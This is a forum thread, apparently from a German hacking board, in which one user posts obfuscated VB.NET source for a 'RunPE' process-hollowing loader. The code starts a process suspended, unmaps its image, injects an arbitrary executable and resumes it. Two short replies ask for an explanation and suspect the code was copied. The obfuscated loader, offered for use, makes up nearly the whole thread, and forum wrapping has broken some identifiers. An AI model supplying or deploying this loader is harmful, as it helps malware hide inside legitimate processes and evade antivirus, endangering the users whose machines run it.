
Unique RunPE



Anatoxis
30.05.2010, 23:05
' Function to Call RunPE is : nTFHDHWFgaoSbRwwbvQbG



Imports System.Runtime.InteropServices
Imports System.ComponentModel

Public Class oOuvQpqDXVEKcjKNMEVuK
Public Const KYNKQAfIHOmeKwdAPZFvW As Long = &H200
Public Const GvPgmDqltaJnZliRncoRo As Long = &H40
Public Const ZIgrlMfrdTqKHAFDqBYRD As Long = &H80
Public Const UfiQKPrXTeNTWmKUQEKlV As Long = &H20
Public Const opBbKYgcDYvnDCdGTZrlg As Long = &H10
Public Const KBSnJhVhkRfKiOApWvbls As Long = &H8
Public Const FZTMfjgOacCTADEJuBNHN As Long = &H1
Public Const YikXfsVTKVjneQYtAWuIZ As Long = &H4
Public Const UJmtDvgAAhHwtFdMYZfbr As UInt32 = &H2
Shared Sub nTFHDHWFgaoSbRwwbvQbG(ByVal JcWTDQLKQTYmIeTieTAcR() As Byte, ByVal FDYpYSWoGfsvYTYCFWjvk As String)
Dim YMoDYbLtnYcSFgrlIsTvv = New UkqZueWadjAbUVwFfvESQ.ntJltnMfNdhvChSoiTmSc, JGawtwBkuWRSgumblpWSo As UkqZueWadjAbUVwFfvESQ.FecVSCMRkhlbvjrsMsHmJ, YnsgRLBWTaWvdvNePQpmV = New UkqZueWadjAbUVwFfvESQ.UOuFnNMCJmqHskSvnTaIn, nXNRnWBIqfabZAmhqpKJB = New UkqZueWadjAbUVwFfvESQ.JhecmfoNaYKuHMITtNsJN, FHgBLiCqQkfGWBNkTQdcf = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr, UpBigtCcnojjTDloupwwM = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr
Dim nBSugFohXhTGAPIaANgwY = GCHandle.Alloc(JcWTDQLKQTYmIeTieTAcR, GCHandleType.Pinned)
Dim JKiIgOemGbDafcbMDjRAj As Integer = nBSugFohXhTGAPIaANgwY.AddrOfPinnedObject.ToInt32
Dim FikeERpTtmYjuRgdbmCTF As New UkqZueWadjAbUVwFfvESQ.YsDqEaeYdfIGbeDPeKjTQ
FikeERpTtmYjuRgdbmCTF = Marshal.PtrToStructure(nBSugFohXhTGAPIaANgwY.AddrO fPinnedObject, FikeERpTtmYjuRgdbmCTF.GetType)
nBSugFohXhTGAPIaANgwY.Free()
If UkqZueWadjAbUVwFfvESQ.CreateProcess(Nothing, FDYpYSWoGfsvYTYCFWjvk, FHgBLiCqQkfGWBNkTQdcf, UpBigtCcnojjTDloupwwM, False, 4, Nothing, Nothing, nXNRnWBIqfabZAmhqpKJB, YnsgRLBWTaWvdvNePQpmV) = 0 Then Return
Dim USFPadpFTrcPqTHgFNVmi As New UkqZueWadjAbUVwFfvESQ.ncWaZleKDkMjYfbSIjFnu
USFPadpFTrcPqTHgFNVmi = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ), USFPadpFTrcPqTHgFNVmi.GetType)
Dim JlmlZuTPkduGFsuFLHmnJ, FMoKvAftapRPVhCWiKYJb As Long, YVIWuJUBKiBiCtWIlgIKn As UInteger
nXNRnWBIqfabZAmhqpKJB.TtJsTMffAtVrRibZMjrdI = Len(nXNRnWBIqfabZAmhqpKJB)
YMoDYbLtnYcSFgrlIsTvv.nGaGTVUkgmFOwvuLPHbdT = 65538
If USFPadpFTrcPqTHgFNVmi.JPqSSdJpQgnidKRuSdLef <> 17744 Or FikeERpTtmYjuRgdbmCTF.EnsnogUWGrKrswVOqguAA <> 23117 Then Return
If UkqZueWadjAbUVwFfvESQ.GetThreadContext(YnsgRLBWTaW vdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv) And UkqZueWadjAbUVwFfvESQ.ReadProcessMemory(YnsgRLBWTa WvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, JlmlZuTPkduGFsuFLHmnJ, 4, 0) >= 0 And UkqZueWadjAbUVwFfvESQ.ZwUnmapViewOfSection(YnsgRLB WTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, JlmlZuTPkduGFsuFLHmnJ) >= 0 Then
Dim IqvvMNwSuigOEaknaChUE As UInt32 = UkqZueWadjAbUVwFfvESQ.VirtualAllocEx(YnsgRLBWTaWvd vNePQpmV.TXNYMsVHdwOXpBuSUHQUe, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.XaQfhY AETnkrBbLqDaDoi, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.TBSEGb LhJBIDQRQKbdlKD, 12288, 4)
If IqvvMNwSuigOEaknaChUE <> 0 Then
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE, JcWTDQLKQTYmIeTieTAcR, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.mKiPFk AmqrpWudjueCWLP, YVIWuJUBKiBiCtWIlgIKn)
FMoKvAftapRPVhCWiKYJb = FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ + 248
For IUCbFtmralZqcqGghXGLb As Integer = 0 To USFPadpFTrcPqTHgFNVmi.ErDAbwAYQwtCrfLAIaoet.XEULaH mdApdWYrejLwZfI - 1
JGawtwBkuWRSgumblpWSo = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FMoKvAftapRPVhCWiKYJb + IUCbFtmralZqcqGghXGLb * 40), JGawtwBkuWRSgumblpWSo.GetType)
Dim TcWhwKBKnEBfngjDiCKBa(JGawtwBkuWRSgumblpWSo.mlmswT nPXuiCVtGmlXsBl) As Byte
For IuGHvccUGnSWCIZYptcBA As Integer = 0 To JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl - 1 : TcWhwKBKnEBfngjDiCKBa(IuGHvccUGnSWCIZYptcBA) = JcWTDQLKQTYmIeTieTAcR(JGawtwBkuWRSgumblpWSo.EVIdUf nBtBmfSuepPwNVS + IuGHvccUGnSWCIZYptcBA) : Next
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, TcWhwKBKnEBfngjDiCKBa, JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl, YVIWuJUBKiBiCtWIlgIKn)
UkqZueWadjAbUVwFfvESQ.VirtualProtectEx(YnsgRLBWTaW vdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, JGawtwBkuWRSgumblpWSo.XfYoUocGdsXCwKAcSUvVe.mlmswT nPXuiCVtGmlXsBl, TFaNpqnkTGrLOwFtqXgow(JGawtwBkuWRSgumblpWSo.nGaGTV UkgmFOwvuLPHbdT), JlmlZuTPkduGFsuFLHmnJ)
Next IUCbFtmralZqcqGghXGLb
Dim mPqZpCdpDwbftLZfttQpL = BitConverter.GetBytes(IqvvMNwSuigOEaknaChUE)
UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWT aWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, mPqZpCdpDwbftLZfttQpL, 4, YVIWuJUBKiBiCtWIlgIKn)
YMoDYbLtnYcSFgrlIsTvv.IYKkoLSukqLBaYsRwRBpW = IqvvMNwSuigOEaknaChUE + USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.JlmlZu TPkduGFsuFLHmnJ
UkqZueWadjAbUVwFfvESQ.SetThreadContext(YnsgRLBWTaW vdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv)
UkqZueWadjAbUVwFfvESQ.ResumeThread(YnsgRLBWTaWvdvN ePQpmV.YwMCopKbnkrOaMpBtEeAM)
End If
End If
End Sub
Private Shared Function EwMJNOdbaEfKpNAiXUjLp(ByVal TgeqjZdMwIknmPYlAtFfV As Long, ByVal XIcUNXSgKuQeXZUUaqTMD As Long) As Long
EwMJNOdbaEfKpNAiXUjLp = mqvFiiTSgCUKTbsYDRmfh(TgeqjZdMwIknmPYlAtFfV) / (2 ^ XIcUNXSgKuQeXZUUaqTMD)
End Function
Private Shared Function mqvFiiTSgCUKTbsYDRmfh(ByVal ICOQirIXQsEeBoOKGnWgt As Long) As Double
Const EaQmHuTDGGZnQdTbeqICO = 4294967296.0#
If ICOQirIXQsEeBoOKGnWgt < 0 Then
mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt + EaQmHuTDGGZnQdTbeqICO
Else
mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt
End If
End Function
Private Shared Function TFaNpqnkTGrLOwFtqXgow(ByVal XjgAGGIJnAJKvpnNhOpCa As Long) As Long
Dim SKiWcJTmdLdTNeseIRbWs() As Object = {FZTMfjgOacCTADEJuBNHN, opBbKYgcDYvnDCdGTZrlg, UJmtDvgAAhHwtFdMYZfbr, UfiQKPrXTeNTWmKUQEKlV, YikXfsVTKVjneQYtAWuIZ, GvPgmDqltaJnZliRncoRo, YikXfsVTKVjneQYtAWuIZ, YikXfsVTKVjneQYtAWuIZ}
TFaNpqnkTGrLOwFtqXgow = SKiWcJTmdLdTNeseIRbWs(EwMJNOdbaEfKpNAiXUjLp(XjgAGG IJnAJKvpnNhOpCa, 29))
End Function
<EditorBrowsable(1)> Friend Class UkqZueWadjAbUVwFfvESQ
<StructLayout(0)> Structure ntJltnMfNdhvChSoiTmSc
Dim nGaGTVUkgmFOwvuLPHbdT, mTCibRIrNENnrrOQLnLWG, IdStbavwuuuJZGiDOLsWS, DDUSAdJdjJSTosmTmOeqk, XNkewmviTCCmVIJGpkOqw, SlmCVpJPJNWvkuOXPnAMR, luGOVBvUqHGSSJhJSLhMd As UInt32, IGWZUKlZaAomwWEsVhRNo As IGWZUKlZaAomwWEsVhRNo
Dim DeYvqMwGQLLvPLJMtkDgJ, WopKqVlLAFsStXcvwIkgV, SOqgPYwpnQPbLMhPXLWDn, lYKrOhluWJAvqZDCahGDC, HhaFOqaCGChSXmXldFnDO, DIcbjsmgtOEbmbcFDIZXg, mgejMEKNNpwrWNQEXdAUq, WRtnjEbldHluUnvoGeJXr, SpvMIHmRTSIHjcDIehrqN, IYKkoLSukqLBaYsRwRBpW, lCOXHQbXDMqaQpXrhFcrY, HLfjHZQckFauvEqekbMrk, DjgHdcbIaQuGNqvuLeuNF, WsATckROJJeasGRhOCfOR, STCpBncrwVCjKsWBmFQhj, lcSDBwRwgOjGoHqkpbAhv As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim HmjPAIGEQHTaWUMWswiiJ As Byte()
End Structure
<StructLayout(0)> Structure IGWZUKlZaAomwWEsVhRNo
Dim DNklWLRiGTnjlJRnSCTEb, WWEwWUHnnMXGSVlZVYEEn, SuGVrWSUdXsPhKpqtbmYI, lGWgrfHZNRciPXMdwwWYU, HQnsrotetKMFtkfPCVHYg, DnpRPrHLjVgOMZkgaYprB, WAIcPDtQTORiqlHSduZsM As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RYKBlFIuJalrIaMjDwLOf As Byte()
Dim lhaMkOuCqTVOnnfVHVsOq As UInt32
End Structure
Structure XfYoUocGdsXCwKAcSUvVe
Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32
End Structure
Structure FecVSCMRkhlbvjrsMsHmJ
Dim HqrYkXjHaMFiUCCIKrcPF As Byte, XfYoUocGdsXCwKAcSUvVe As XfYoUocGdsXCwKAcSUvVe, JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl, EVIdUfnBtBmfSuepPwNVS, CRtuJaulQYarjoGYhuOiX, WbMIIjjqARKOREaLkSvij, RBOeemuWnceXgqfcLVhFE, kLfqevkcWVOrNFBOOrRFQ, nGaGTVUkgmFOwvuLPHbdT As UInt32
End Structure
Structure UOuFnNMCJmqHskSvnTaIn
Dim TXNYMsVHdwOXpBuSUHQUe, YwMCopKbnkrOaMpBtEeAM As IntPtr, HUvEdGZhGPvNsSVARPBFb, CsAaCJkNtaTWKHaRpSkZt As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure JhecmfoNaYKuHMITtNsJN
Dim TtJsTMffAtVrRibZMjrdI As Integer, VEQlCSZTdTDqpTtDsoUZI, RcSKXVkwTfXCHIBUSrGsa, kmjWXeaEDYHWlVUHVPntm As String, GvChXnPJkRpqTioqYlXtB, IuGHvccUGnSWCIZYptcBA, CWEGspanZdMCiXtKwoJPT, VfURsBPsJWtWPjPtCMqQe, RGWnREaZwhQfeYUNaPcjA, kPnCQNPegaACMlowdlMjL, GZGNQWFjQUiWqAKjgJtkX, nGaGTVUkgmFOwvuLPHbdT As Integer
Dim CAIjmYQQGfFfJmPCHMfGp, VJZvlhFVnYmBnCimKiPGE As Short, RhaTKkQCdkJKFonGhlAZW, kqrfKtFHMdrekDKpkJiai, GDKqJFsMtWbBRQdbnfSat, CaMPfIGqjhvKgFisOiDtO As Integer
End Structure
<StructLayout(0)> Structure YRwNLrowAdPaEOgXXmNdr
Dim VkdbfRsvTbfeORFeRGlua As Integer, RLfADTGbJmDndGJvpJWQs As IntPtr, kUvLDcshqfkKKTdisfGQH As Integer
End Structure
<StructLayout(0)> Structure YsDqEaeYdfIGbeDPeKjTQ
Dim EnsnogUWGrKrswVOqguAA, GdPWDlhmaZUepgwUvDoRT, CEQsYotSQkonHVElVGZkl, mwqbjwqZvYOimAiXLYfuG, mlmswTnPXuiCVtGmlXsBl, IIJniIfefSvETNEJOtPuR, EgLLHKqLVdTNiCJamwBRj, lcSDBwRwgOjGoHqkpbAhv, XpcXHTgQFWDhQOcMpViRv, qCsiGcVVmPkEubwwsrSRK, mZuHcfgCcbHNMQEPTtEkc, IjOTcoVHMUohrcXCWSllo, EKPpBrgkCfMqJRcTtVWHJ, XTgDACWqiZtNnewFwrHHU As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim VEQlCSZTdTDqpTtDsoUZI As UInt16()
Dim qcwOALLvSSdhVqSoCPoIg, mDBkWOWbIdAqkfXIaSZbB As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim VJZvlhFVnYmBnCimKiPGE As UInt16()
Dim JlmlZuTPkduGFsuFLHmnJ As Int32
End Structure
Structure ncWaZleKDkMjYfbSIjFnu
Dim JPqSSdJpQgnidKRuSdLef As UInt32, ErDAbwAYQwtCrfLAIaoet As INSwVXLgpWhNSsqrdoKbN, ERwUhPKvktDXTPpHAEToX As EkTVraWNfiFWhhvLErsvf
End Structure
<StructLayout(0)> Structure INSwVXLgpWhNSsqrdoKbN
Dim XukgqjLSPbmpOtSvHPcvr, XEULaHmdApdWYrejLwZfI As UInt16, qGDsqsBXwUWMtJlhKlNvF, EKPpBrgkCfMqJRcTtVWHJ, meFQPuMEmgqVLvqBhovSY As UInt32, mlmswTnPXuiCVtGmlXsBl, nGaGTVUkgmFOwvuLPHbdT As UInt16
End Structure
<StructLayout(0)> Structure EkTVraWNfiFWhhvLErsvf
Public EnsnogUWGrKrswVOqguAA As UInt16, InWcOGBJVZbppKNkkMgSj, EOYBkJMnLkvBHARELPRlE As Byte, XXoMkSBssefVmMlnOlBmQ, qhIYjbnAcXPpTZHaRJjmc, mIJuIdCeSikBjOMqpMUIu, JlmlZuTPkduGFsuFLHmnJ, IRaIImojCbUVQagdsiEJJ, JcWTDQLKQTYmIeTieTAcR, XaQfhYAETnkrBbLqDaDoi As UInt32, EpcedpCQpnoefPluTlncb, XBspdBoVZgYBNcHgWJXcm As UInt32
Public qLMEdKdaIZIUrobSZfHdB, miOaBNpHvlddJdfjwiqwT, IselBVeMfeNAoqCVCGawf, DTgKXYppVphJGfHmaJMSA, XcwWWhevFiRdkraZdftTM, qlQhWqTDmcCASHuLgDdTX As UInt16, lMSGstegcnWJhtCcHGPmq, TBSEGbLhJBIDQRQKbdlKD, mKiPFkAmqrpWudjueCWLP, qCsiGcVVmPkEubwwsrSRK As UInt32, IWiRrFUlMgGdPIVOKcwnE, nGaGTVUkgmFOwvuLPHbdT As UInt16
Public DtknQHfSCsamevafhfiJW, WGDCQQUXilLJLKtRlDSJi, pPUNPZJcSescqXQEoZCKu, lnWjlcUJIqPmIMVUOcldP, HwmullKOpjwImYoHRAVdb, DXoTJnVsfuTRENtYpDGAt As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public WhIfJwKAPnEljaQKsZoAH As WhIfJwKAPnEljaQKsZoAH()
End Structure
<StructLayout(0)> Structure WhIfJwKAPnEljaQKsZoAH
Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32
End Structure
Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As YRwNLrowAdPaEOgXXmNdr, ByRef thread As YRwNLrowAdPaEOgXXmNdr, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As JhecmfoNaYKuHMITtNsJN, <Out()> ByRef info As UOuFnNMCJmqHskSvnTaIn) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean
End Class
End Class

Cristhecrusader
30.05.2010, 23:07
Ein bisschen etwas dazu zu sagen wäre nett. Naja, ich kann sowieso kein .NET und halte mich dann raus.

Southpark
30.05.2010, 23:10
Also 1. wäre es toll, wenn du die Sources nicht einfach hier reinpostest, sondern auch was dazu sagst.
2. glaube ich, dass die Sources alle von irgendwo c&p sind und das einfach nur zum Post-Pushing dienen soll.
3. Setze das in einen [Code]-Tag und eventuell einen Spoiler, dann sieht das alles ein bisschen besser aus.

mfg Southi